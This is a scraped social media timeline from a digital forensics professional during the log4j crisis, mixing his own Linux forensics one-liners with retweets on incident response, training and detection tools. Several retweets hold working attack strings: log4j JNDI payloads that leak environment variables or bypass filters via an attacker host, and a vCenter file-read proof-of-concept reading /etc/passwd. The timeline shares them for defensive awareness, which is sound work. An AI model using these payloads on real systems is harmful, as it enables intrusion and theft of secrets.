I am retiring this social media account. Find me as @hal_pomeranz@infosec.exchange
Orlando, FL
Joined November 2008
- Tweets 19,311
- Following 237
- Followers 13,672
- Likes 12
Hal Pomeranz retweeted
If you need help with Linux Forensics? Please check out my repo with lots of content at the URL below, plus check @CraigHRowland and @hal_pomeranz work too #DFIR #log4j
linuxdfir.ashemery.com/ #DFIR #log4j
3
37
106
Another fun Linux command line:
"sudo ls -l /proc/[0-9]*/exe 2>/dev/null | awk '/ -> / && !/\/usr\/(lib(exec)?|s?bin)\// {print $9, $10, $11}' | sed 's,/proc/\([0-9]*\)/exe,\1,'"
Display PIDs with non-standard EXE paths
2
54
2
284
Hal Pomeranz retweeted
Good morning folks. If you're patching #log4j today on an Internet facing service, you need to be doing an incident response too. The reality is that someone else almost certainly beat you to it. Patching doesn't remove the existing compromise.
7
145
5
503
Another vuln where strict egress filtering would have greatly reduced possible impact to your environment. Make sure implementing egress filtering is part of your recovery plan. #log4j
2
1
8
Helpful Linux command-lines:
“find /tmp /var/tmp /dev/shm -type f \( -perm -0100 -o -perm -0001 \)”
Looks through tmpdirs for files with execute set for self or others—coin miners, install scripts, etc. #log4j
8
19
Hal Pomeranz retweeted
Side tweet (and cannot believe I'm writing this):
Managers & up in orgs, please read this thread.
If you call staff back in or cancel vacations to deal with log4j... yes, you *can* do that.
but...
2
16
69
Hal Pomeranz retweeted
I've prepared a @RealTryHackMe room to demonstrate #log4j #log4shell CVE-2021-44228, explaining the vulnerability, attack vector, and more importantly, detection, mitigations and patching. Working with THM staff to get this in your hands -- it should be available soon.
103
529
37
2,590
If you’re struggling with the Linux forensics in the wake of #log4j, archive.org/details/HalLinux… may help. As always, feel free to reach out—I’m here to help with everything from simple syntax questions all the way up to full consulting engagements.
4
30
There may be earlier exploitation, but “find / -mtime -4” is a good way to look for weekend #log4j carnage on your Linux servers. RCE is likely unprivileged, so focus first on [/var]/tmp, /dev/shm, and similar world-write directories.
2
45
102
Hal Pomeranz retweeted
Made 2 edits to deck from suggestions by @mubix
slight wording change to fix a small error.
Added a "how to do we avoid repeats?" slide.
Other constructive criticism welcomed! Will give credit if you want it. If you need to keep low profile, I'll say "some anonymous source"
If you've not already briefed your executives or board about Log4j, you will soon.
here's a powerful 4 page PPT deck you can use to get the issue across to them.
FYI: this was developed by myself and two execs who wish to remain nameless.
Please share!
infosecinnovations.com/post/…
1
1
5
Hal Pomeranz retweeted
#Log4J based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.
Self propagating with the ability to stand up a self hosted server on compromised endpoints.
In addition to spraying traffic, dropping files, it will have c2c
28
585
139
1,563
Hal Pomeranz retweeted
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like
${jndi:ldap://${env:user}.xyz.collab.com/a}
Will leak server side env vars!
21
577
98
2,456
Hal Pomeranz retweeted
VMware vCenter unauthorized arbitrary file read
PoC working to Earlier versions (7.0.2.00100)
[PoC]
curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"
github.com/l0ggg/VMware_vCen…
7
185
5
543
Hal Pomeranz retweeted
Amongst the frenzy of detection and prevention efforts for #log4j #log4shell CVE-2022-44228, @HuntressLabs team members including myself @calebjstewart, and @jslagle , have prepared a service to help you better test and detect vulnerable applications. log4shell.huntress.com
We’ve created a tool to help you detect applications that are vulnerable to CVE-2021-44228. (h/t @calebjstewart, @jslagle & @_JohnHammond)
This is intended for testing purposes only and should be used on systems you’re authorized to test. hubs.ly/Q010G3ZG0
6
144
5
460
Hal Pomeranz retweeted
If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you:
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
This gets past every filter I've found so far. There's no shortage of these bypasses.
#log4j
31
769
60
2,676
Hal Pomeranz retweeted
I will be teaching the @sansforensics FOR500 Windows Forensic Analysis course in San Juan, PR in January 2022 at the beautiful @gmsectec facilities. @SANSInstitute is coming to PR. Learn Computer Forensics with us. Registration Link below.
sans.org/cyber-security-even…
1
5
1
9
Hal Pomeranz retweeted
I wish I was as in love with SBOM as many people are. I feel the cries of overtaxed responders, drowning & looking for hope in prioritization.
Security response isn’t a romcom in which an SBOM hero leads to a happy ending to a crisis.
It’s still a horror show of asset management.
2
1
1
19
Hal Pomeranz retweeted
Interested in up-to-date reports of #log4shell exploitation? Our API can help! Search today's reports by user-agent: isc.sans.edu/api/webhoneypot…:?json or by URL isc.sans.edu/api/webhoneypot…:?json #jq FTW for pretty output. #log4j #log4j2
1
30
1
94
Hal Pomeranz retweeted
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now.
Here's what you do if you're in this situation.
1. Keep calm. There's no need to panic.
2. Carefully read this thread.
1/?
43
880
95
2,620